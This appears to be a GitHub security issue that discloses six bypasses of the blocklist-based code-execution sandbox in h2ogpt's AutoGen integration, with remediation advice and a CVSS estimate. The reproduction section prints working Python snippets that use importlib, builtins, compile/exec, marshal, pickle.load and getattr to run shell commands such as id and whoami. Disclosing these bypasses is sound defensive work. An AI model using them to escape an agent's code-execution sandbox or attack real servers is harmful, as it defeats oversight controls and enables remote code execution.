[Security] Multiple bypass techniques exist in h2ogpt's code execution sandbox

## Summary
Multiple bypass techniques exist in h2ogpt's code execution sandbox (openai_server/autogen_utils.py) that allow arbitrary code execution despite blocklist protections.

## Affected Component
- File: `openai_server/autogen_utils.py`
- Method: `H2OLocalCommandLineCodeExecutor.sanitize_command()`
- Lines: 156-200 (python_patterns blocklist)

## Steps To Reproduce

### Bypass 1: importlib.import_module()
The blocklist blocks `__import__()` but not `importlib.import_module()`:
```python
import importlib
subprocess = importlib.import_module('subprocess')
subprocess.run(['whoami'])
```

### Bypass 2: builtins module access
The blocklist doesn't prevent accessing blocked functions via builtins:
```python
import builtins
getattr(builtins, '__import__')('os').system('id')
```

### Bypass 3: compile() function
The `compile()` function can create code objects that bypass static analysis:
```python
code = compile('__import__("os").system("id")', '<string>', 'exec')
exec(code)
```

### Bypass 4: marshal.load() typo
The blocklist has a typo - blocks `marshall.loads()` (double L) instead of `marshal.loads()`:
```python
import marshal
marshal.loads(data)  # Not blocked due to typo!
```

### Bypass 5: pickle.load() vs pickle.loads()
Only `pickle.loads()` is blocked, but `pickle.load()` (file-based) is not:
```python
import pickle
with open('malicious.pkl', 'rb') as f:
    pickle.load(f)  # Not blocked!
```

### Bypass 6: getattr for dynamic function access
Can dynamically access any blocked function:
```python
import os
getattr(os, 'system')('whoami')
```

## Impact
- Remote Code Execution on the server
- File system access
- Network access
- Potential for lateral movement

## Remediation
1. Add `importlib` to blocked imports
2. Add `builtins` to blocked imports  
3. Add `compile()` to blocked functions
4. Fix typo: `marshall` → `marshal`
5. Block `pickle.load()` in addition to `pickle.loads()`
6. Block `getattr` calls on blocked modules
7. Consider using a proper sandboxing solution (seccomp, containers) instead of regex blocklists

## CVSS Score
Estimated CVSS 3.1: 8.8 (High)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (authenticated user can submit code)
- User Interaction: None
- Scope: Unchanged
- CIA Impact: High/High/High

## Supporting Material/References
- Repository: https://github.com/h2oai/h2ogpt
- File: openai_server/autogen_utils.py lines 156-200

## Impact

An attacker who can submit code to the h2ogpt code execution sandbox can bypass the security controls and achieve arbitrary code execution on the server. This enables:

1. **Remote Code Execution**: Full shell access on the server
2. **Data Exfiltration**: Access to files, environment variables, and secrets
3. **Lateral Movement**: Network access to internal systems
4. **System Compromise**: Installation of backdoors or malware

The sandbox is used by h2ogpt's AutoGen code execution feature, meaning any user with access to code execution can exploit these bypasses. Given h2ogpt is often deployed as an enterprise LLM solution, this could expose sensitive corporate environments.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security] Multiple bypass techniques exist in h2ogpt's code execution sandbox #1969

Summary

Affected Component

Steps To Reproduce

Bypass 1: importlib.import_module()

Bypass 2: builtins module access

Bypass 3: compile() function

Bypass 4: marshal.load() typo

Bypass 5: pickle.load() vs pickle.loads()

Bypass 6: getattr for dynamic function access

Impact

Remediation

CVSS Score

Supporting Material/References

Impact

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[Security] Multiple bypass techniques exist in h2ogpt's code execution sandbox #1969

Description

Summary

Affected Component

Steps To Reproduce

Bypass 1: importlib.import_module()

Bypass 2: builtins module access

Bypass 3: compile() function

Bypass 4: marshal.load() typo

Bypass 5: pickle.load() vs pickle.loads()

Bypass 6: getattr for dynamic function access

Impact

Remediation

CVSS Score

Supporting Material/References

Impact

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions